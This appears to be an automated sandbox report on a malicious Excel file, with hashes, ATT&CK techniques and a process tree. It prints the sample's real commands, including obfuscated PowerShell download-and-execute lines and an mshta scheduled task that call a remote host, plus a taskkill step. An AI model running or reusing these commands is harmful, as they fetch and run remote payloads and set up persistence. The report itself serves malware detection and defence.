3ae788e07d265a5c6d9d79c13aea5769812c205d22a89b338ab8764cd9b364f1

General

Target

SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls
Size

33KB
MD5

fba667decfca0daf6f92277fec2d16cf
SHA1

e78d07658f5a3461d43f4a84747455ef025eab09
SHA256

3ae788e07d265a5c6d9d79c13aea5769812c205d22a89b338ab8764cd9b364f1
SHA512

04e59d93c8fdda2461a4d353f2cf7de4e526a54d441bfb32ffd883bdbb3db6e2d5081be31d6da61fe06b24690515278766d852fff9db5c764099032abbafe048

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2824	3404	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3164	3404	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4208	3404	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4240	3404	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

27 2224 powershell.exe
28 1916 powershell.exe

flow	pid	process
27	2224	powershell.exe
28	1916	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1516 schtasks.exe

pid	process
1516	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4228 taskkill.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

4340 PING.EXE
1732 PING.EXE
4320 PING.EXE
3572 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3404 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2224 powershell.exe
2224 powershell.exe
1916 powershell.exe
1916 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

taskkill.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4228 taskkill.exe
Token: SeDebugPrivilege 2224 powershell.exe
Token: SeDebugPrivilege 1916 powershell.exe

pid	process
4228	taskkill.exe

pid	process
4340	PING.EXE
1732	PING.EXE
4320	PING.EXE
3572	PING.EXE

pid	process
2224	powershell.exe
2224	powershell.exe
1916	powershell.exe
1916	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4228	taskkill.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE
3404	EXCEL.EXE

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3404 wrote to memory of 2824	3404	EXCEL.EXE	cmd.exe
PID 3404 wrote to memory of 2824	3404	EXCEL.EXE	cmd.exe
PID 3404 wrote to memory of 3164	3404	EXCEL.EXE	cmd.exe
PID 3404 wrote to memory of 3164	3404	EXCEL.EXE	cmd.exe
PID 3404 wrote to memory of 4208	3404	EXCEL.EXE	cmd.exe
PID 3404 wrote to memory of 4208	3404	EXCEL.EXE	cmd.exe
PID 3404 wrote to memory of 4240	3404	EXCEL.EXE	cmd.exe
PID 3404 wrote to memory of 4240	3404	EXCEL.EXE	cmd.exe
PID 2824 wrote to memory of 4340	2824	cmd.exe	PING.EXE
PID 2824 wrote to memory of 4340	2824	cmd.exe	PING.EXE
PID 3164 wrote to memory of 1732	3164	cmd.exe	PING.EXE
PID 3164 wrote to memory of 1732	3164	cmd.exe	PING.EXE
PID 4240 wrote to memory of 3572	4240	cmd.exe	PING.EXE
PID 4240 wrote to memory of 3572	4240	cmd.exe	PING.EXE
PID 4208 wrote to memory of 4320	4208	cmd.exe	PING.EXE
PID 4208 wrote to memory of 4320	4208	cmd.exe	PING.EXE
PID 4208 wrote to memory of 1048	4208	cmd.exe	cmd.exe
PID 4208 wrote to memory of 1048	4208	cmd.exe	cmd.exe
PID 1048 wrote to memory of 2224	1048	cmd.exe	powershell.exe
PID 1048 wrote to memory of 2224	1048	cmd.exe	powershell.exe
PID 4208 wrote to memory of 4164	4208	cmd.exe	cmd.exe
PID 4208 wrote to memory of 4164	4208	cmd.exe	cmd.exe
PID 4164 wrote to memory of 4228	4164	cmd.exe	taskkill.exe
PID 4164 wrote to memory of 4228	4164	cmd.exe	taskkill.exe
PID 2824 wrote to memory of 1760	2824	cmd.exe	cmd.exe
PID 2824 wrote to memory of 1760	2824	cmd.exe	cmd.exe
PID 1760 wrote to memory of 1916	1760	cmd.exe	powershell.exe
PID 1760 wrote to memory of 1916	1760	cmd.exe	powershell.exe
PID 3164 wrote to memory of 2928	3164	cmd.exe	cmd.exe
PID 3164 wrote to memory of 2928	3164	cmd.exe	cmd.exe
PID 2928 wrote to memory of 1516	2928	cmd.exe	schtasks.exe
PID 2928 wrote to memory of 1516	2928	cmd.exe	schtasks.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3404

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2824

C:\Windows\system32\PING.EXE
ping -n 80 127.0.0.1
3⤵
- Runs ping.exe
PID:4340

C:\Windows\system32\cmd.exe
cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
3⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\system32\PING.EXE
ping -n 85 127.0.0.1
3⤵
- Runs ping.exe
PID:1732

C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
3⤵
- Suspicious use of WriteProcessMemory
PID:2928

C:\Windows\system32\schtasks.exe
schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
4⤵
- Creates scheduled task(s)
PID:1516

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4208

C:\Windows\system32\PING.EXE
ping -n 10 127.0.0.1
3⤵
- Runs ping.exe
PID:4320

C:\Windows\system32\cmd.exe
cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
3⤵
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\system32\cmd.exe
cmd /c start /min taskkill /f /im WINWORD.EXE
3⤵
- Suspicious use of WriteProcessMemory
PID:4164

C:\Windows\system32\taskkill.exe
taskkill /f /im WINWORD.EXE
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4240

C:\Windows\system32\PING.EXE
ping -n 7 127.0.0.1
3⤵
- Runs ping.exe
PID:3572

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
abc27673d9c940ad74b41c58391d2412

SHA1
9a31a521a521dcd0f974ce6f7a50aecc69a50df0

SHA256
cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

SHA512
c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
6KB

MD5
b55d9c20acad4578867c42143b3a1835

SHA1
1fe1330a89ccb853c14b0d4302b65c485c2edde8

SHA256
31871e4235e1f3746faa8ca8eab4baf87063dbc1567eead21ba7153fc9f048fd

SHA512
0d7cd16ed639ed7e6c2af57eadb8842badd3775f6645279cda631decf79f60f33af508cbc929b51e49cc7c0ce3fd0c2176d99ed3f713c1e4a70669a7069e1459

Download Submit
C:\Users\Public\DefenderFile.bat
Filesize
1KB

MD5
ae4a0997ce01f4ebbb3f3cc0054ce933

SHA1
e5bfe3b390f1208b8b6ea0317f4364005f552851

SHA256
a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

SHA512
5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

Download Submit
C:\Users\Public\Outlook.bat
Filesize
900B

MD5
0427a3545c2eaed3167cffe2cf5f8aba

SHA1
b27f3a7d2b855f1d0b84727603add711bb6f6170

SHA256
ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

SHA512
fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

Download Submit
C:\Users\Public\task.bat
Filesize
954B

MD5
20a395a26f50352dc994664c3e7df533

SHA1
9b6407d22297b7af7c49aacd51bf42e51ced7029

SHA256
c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32

SHA512
2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617

Download Submit
memory/1048-148-0x0000000000000000-mapping.dmp

Download
memory/1516-170-0x0000000000000000-mapping.dmp

Download
memory/1732-144-0x0000000000000000-mapping.dmp

Download
memory/1760-161-0x0000000000000000-mapping.dmp

Download
memory/1916-166-0x00007FFA31BE0000-0x00007FFA326A1000-memory.dmp

Filesize
10.8MB

Download
memory/1916-167-0x00007FFA31BE0000-0x00007FFA326A1000-memory.dmp

Filesize
10.8MB

Download
memory/1916-162-0x0000000000000000-mapping.dmp

Download
memory/2224-154-0x00007FFA26A00000-0x00007FFA274C1000-memory.dmp

Filesize
10.8MB

Download
memory/2224-153-0x00007FFA26A00000-0x00007FFA274C1000-memory.dmp

Filesize
10.8MB

Download
memory/2224-149-0x0000000000000000-mapping.dmp

Download
memory/2224-152-0x000001D22A870000-0x000001D22A892000-memory.dmp

Filesize
136KB

Download
memory/2824-139-0x0000000000000000-mapping.dmp

Download
memory/2928-169-0x0000000000000000-mapping.dmp

Download
memory/3164-140-0x0000000000000000-mapping.dmp

Download
memory/3404-132-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3404-138-0x00007FFA0E470000-0x00007FFA0E480000-memory.dmp

Filesize
64KB

Download
memory/3404-156-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3404-157-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3404-158-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3404-159-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3404-137-0x00007FFA0E470000-0x00007FFA0E480000-memory.dmp

Filesize
64KB

Download
memory/3404-136-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3404-135-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3404-133-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3404-134-0x00007FFA10630000-0x00007FFA10640000-memory.dmp

Filesize
64KB

Download
memory/3572-145-0x0000000000000000-mapping.dmp

Download
memory/4164-150-0x0000000000000000-mapping.dmp

Download
memory/4208-141-0x0000000000000000-mapping.dmp

Download
memory/4228-151-0x0000000000000000-mapping.dmp

Download
memory/4240-142-0x0000000000000000-mapping.dmp

Download
memory/4320-146-0x0000000000000000-mapping.dmp

Download
memory/4340-143-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads